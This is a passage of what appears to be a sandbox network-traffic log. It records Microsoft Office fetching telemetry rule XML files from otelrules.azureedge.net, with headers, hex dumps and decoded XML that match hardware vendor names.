                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:34 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 404
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                                                                          ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                                                                          x-ms-request-id: f19b5380-801e-0015-2749-3cf97f000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164434Z-15b8b599d88s6mj9hC1TEBur3000000002zg00000000d540
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:35 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          31192.168.2.54974113.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:34 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:35 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 472
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                          ETag: "0x8DC582B9DACDF62"
                                                                                                                                                                                          x-ms-request-id: 798eb064-701e-0021-422e-3c3d45000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164435Z-178bfbc474bpscmfhC1NYCfc2c000000038000000000fnw2
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:35 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          32192.168.2.54974013.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:34 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:35 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 419
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                                                                          ETag: "0x8DC582B9748630E"
                                                                                                                                                                                          x-ms-request-id: 5931471e-001e-0046-7a23-3dda4b000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164435Z-174c587ffdfdwxdvhC1TEB1c4n0000000360000000004gr2
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:35 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          33192.168.2.54974413.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:34 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:35 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 428
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                          ETag: "0x8DC582BAC4F34CA"
                                                                                                                                                                                          x-ms-request-id: a72cf994-301e-0099-6e45-3c6683000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164435Z-15b8b599d88wn9hhhC1TEBry0g000000035000000000m19t
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:35 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          34192.168.2.54974313.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:34 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:35 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 468
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                          ETag: "0x8DC582B9C8E04C8"
                                                                                                                                                                                          x-ms-request-id: babf4520-701e-005c-6e46-3cbb94000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164435Z-15b8b599d88pxmdghC1TEBux9c000000039000000000cp8e
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:35 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          35192.168.2.54974513.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:36 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:37 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:37 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 499
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                                                                          ETag: "0x8DC582B98CEC9F6"
                                                                                                                                                                                          x-ms-request-id: be70ec4e-301e-000c-088c-3a323f000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164437Z-174c587ffdf4zw2thC1TEBu34000000003b0000000004abd
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:37 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          36192.168.2.54974613.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:37 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:37 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:37 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 415
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                          ETag: "0x8DC582B988EBD12"
                                                                                                                                                                                          x-ms-request-id: 6a83a5f2-e01e-000c-157b-3b8e36000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164437Z-174c587ffdf89smkhC1TEB697s000000039000000000ahr3
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:37 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          37192.168.2.54974713.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:37 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:37 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:37 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 471
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                          ETag: "0x8DC582BB5815C4C"
                                                                                                                                                                                          x-ms-request-id: a24720e5-f01e-0096-3f65-3b10ef000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164437Z-178bfbc474bfw4gbhC1NYCunf400000004t00000000061mq
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:37 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          38192.168.2.54974813.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:37 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:37 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:37 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 419
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                          ETag: "0x8DC582BB32BB5CB"
                                                                                                                                                                                          x-ms-request-id: 4246a62e-c01e-008e-5315-3d7381000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164437Z-178bfbc474bvjk8shC1NYC83ns00000004n0000000004vwz
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:37 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          39192.168.2.54974913.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:37 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:37 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:37 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 494
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                          ETag: "0x8DC582BB8972972"
                                                                                                                                                                                          x-ms-request-id: db42c49d-901e-007b-4a2f-3cac50000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164437Z-178bfbc474bgvl54hC1NYCsfuw00000004m000000000kmx7
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:37 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


